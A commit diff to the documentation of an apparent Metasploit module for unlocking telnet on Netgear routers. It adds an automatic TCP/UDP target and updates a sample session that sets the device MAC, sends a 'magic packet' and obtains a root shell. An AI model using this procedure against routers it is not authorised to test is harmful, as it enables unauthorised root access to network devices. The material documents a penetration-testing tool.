Update doc for automatic targeting
parent
fba30d47a2
commit
4b29df7ab3
|
@ -21,11 +21,15 @@ A MAC address is required for exploitation. To determine the MAC address of the
|
|||
|
||||
## Targets
|
||||
|
||||
**0 (TCP)**
|
||||
**0 (Automatic)**
|
||||
|
||||
Detect if a device listens on TCP or UDP.
|
||||
|
||||
**1 (TCP)**
|
||||
|
||||
Older devices usually listen on TCP.
|
||||
|
||||
**1 (UDP)**
|
||||
**2 (UDP)**
|
||||
|
||||
Newer devices usually listen on UDP.
|
||||
|
||||
|
@ -72,11 +76,11 @@ msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
|
|||
[*] exec: ping -c 1 192.168.1.1
|
||||
|
||||
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
|
||||
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.38 ms
|
||||
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.40 ms
|
||||
|
||||
--- 192.168.1.1 ping statistics ---
|
||||
1 packets transmitted, 1 received, 0% packet loss, time 0ms
|
||||
rtt min/avg/max/mdev = 1.381/1.381/1.381/0.000 ms
|
||||
rtt min/avg/max/mdev = 1.408/1.408/1.408/0.000 ms
|
||||
msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
|
||||
[*] exec: arp -an 192.168.1.1
|
||||
|
||||
|
@ -85,6 +89,7 @@ msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
|
|||
mac => [redacted]
|
||||
msf5 exploit(linux/telnet/netgear_telnetenable) > run
|
||||
|
||||
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
|
||||
[*] 192.168.1.1:23 - Generating magic packet
|
||||
[*] 192.168.1.1:23 - Connecting to telnetenabled
|
||||
[*] 192.168.1.1:23 - Sending magic packet
|
||||
|
@ -98,6 +103,6 @@ id
|
|||
uid=0 gid=0(root)
|
||||
# uname -a
|
||||
uname -a
|
||||
Linux (none) 2.6.36.4brcmarm+ #17 PREEMPT Thu Apr 25 10:00:48 CST 2013 armv7l unknown
|
||||
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
|
||||
#
|
||||
```
|
||||
|
|
Loading…
Reference in New Issue